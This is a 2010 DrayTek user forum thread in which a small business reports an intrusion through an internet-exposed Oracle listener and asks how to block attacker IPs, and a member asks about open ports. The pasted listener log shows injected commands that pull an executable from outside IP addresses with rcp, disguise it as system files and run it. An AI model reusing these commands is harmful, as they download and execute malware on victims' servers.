DrayTek UK Users' Community Forum
Help, Advice and Solutions from DrayTek Users
Vigor 2600
- hot_dog
- Topic Author
- Offline
- New Member
Less
More
- Posts: 4
- Thank you received: 0
03 Nov 2010 14:07 #64657
by hot_dog
Vigor 2600 was created by hot_dog
Hi. Can somebody tell me if its possible to block certain IP address's from accessing our network from the web.
It would appear we had a hack last night, didn't do too much damage as far as we are aware, but they tried copying files from a server to ours.
I'm sure they'll be back to finish the job, so want to stop these ip address's using the firewall in the router.
Trouble is, is this router too old for things like this?
It would appear we had a hack last night, didn't do too much damage as far as we are aware, but they tried copying files from a server to ours.
I'm sure they'll be back to finish the job, so want to stop these ip address's using the firewall in the router.
Trouble is, is this router too old for things like this?
Please Log in or Create an account to join the conversation.
- lozstlouis
- Offline
- Member
Less
More
- Posts: 107
- Thank you received: 0
03 Nov 2010 14:30 #64663
by lozstlouis
www.alits.co.uk
Replied by lozstlouis on topic Vigor 2600
These attacks on port 80? Or do you have some other means of entry?
Please Log in or Create an account to join the conversation.
- hot_dog
- Topic Author
- Offline
- New Member
Less
More
- Posts: 4
- Thank you received: 0
03 Nov 2010 15:24 #64666
by hot_dog
Replied by hot_dog on topic Vigor 2600
Hi Lozstlouis,
How can I tell how they gained entry? It would appear they tried to copy a file over to an Oracle server by pretending to be a user. They managed to copy a ora.bat file into the start up folder, then disabled the oracle listener. Of course I restarted the server and the bat file was activated.
It would however appear that this bat file had failed to do its job, as the last command in the file was to delete the bat file, but it was still there after the reboot.
Contents of the file:
02-NOV-2010 22:13:11 * log_file * 0
02-NOV-2010 22:13:11 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 89.249.22.15.adm:/var/adm/.x/ka.exe c:\ntldr.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\ntldr.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 140.117.31.8.adm:/var/adm/.x/ka.exe c:\svchost.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\svchost.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:13 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || del c:\Documents and Settings\All Users\Start Menu\Programs\Startup\ora.bat || error
NL-00303: syntax error in NV string
Im confused as to why port 80 is visible on the web, as nothing is being redirected and the management from the internet is turned off? But according to Shields Up, it can see port 80 is open, along with ports 23,25 and 143.
Now we do have a mail server running, so this could have something to do with the above, but i don't really know
How can I tell how they gained entry? It would appear they tried to copy a file over to an Oracle server by pretending to be a user. They managed to copy a ora.bat file into the start up folder, then disabled the oracle listener. Of course I restarted the server and the bat file was activated.
It would however appear that this bat file had failed to do its job, as the last command in the file was to delete the bat file, but it was still there after the reboot.
Contents of the file:
02-NOV-2010 22:13:11 * log_file * 0
02-NOV-2010 22:13:11 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 89.249.22.15.adm:/var/adm/.x/ka.exe c:\ntldr.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\ntldr.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 140.117.31.8.adm:/var/adm/.x/ka.exe c:\svchost.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\svchost.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:13 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || del c:\Documents and Settings\All Users\Start Menu\Programs\Startup\ora.bat || error
NL-00303: syntax error in NV string
Im confused as to why port 80 is visible on the web, as nothing is being redirected and the management from the internet is turned off? But according to Shields Up, it can see port 80 is open, along with ports 23,25 and 143.
Now we do have a mail server running, so this could have something to do with the above, but i don't really know
Please Log in or Create an account to join the conversation.
- lozstlouis
- Offline
- Member
Less
More
- Posts: 107
- Thank you received: 0
04 Nov 2010 10:12 #64685
by lozstlouis
www.alits.co.uk
Replied by lozstlouis on topic Vigor 2600
Port scanner detected 80 (sure remote management is off?) Port 23 (telnet) 25 (SMTP) & 143 (IMAP). So ports 25 & 143 will be your mail server. What is Oracle doing outward facing? Remote users? What port?
Please Log in or Create an account to join the conversation.
- hot_dog
- Topic Author
- Offline
- New Member
Less
More
- Posts: 4
- Thank you received: 0
04 Nov 2010 10:26 #64688
by hot_dog
Replied by hot_dog on topic Vigor 2600
Yes, remote management is off, tried a port scan again late last night and the only ports it found open this time were 23, 25 & 143.
I don't know why Oracle was Outward facing, but it was on port 1521 which has now been removed, which i'm now suspecting they used to connect to us.
There used to be remote users at one time......
I don't know why Oracle was Outward facing, but it was on port 1521 which has now been removed, which i'm now suspecting they used to connect to us.
There used to be remote users at one time......
Please Log in or Create an account to join the conversation.
- lozstlouis
- Offline
- Member
Less
More
- Posts: 107
- Thank you received: 0
04 Nov 2010 10:28 #64691
by lozstlouis
www.alits.co.uk
Replied by lozstlouis on topic Vigor 2600
Then that will problem slam the door shut on any foul play. What the telnet port open for?
Please Log in or Create an account to join the conversation.
Moderators: Chris, Sami
Copyright © 2024 DrayTek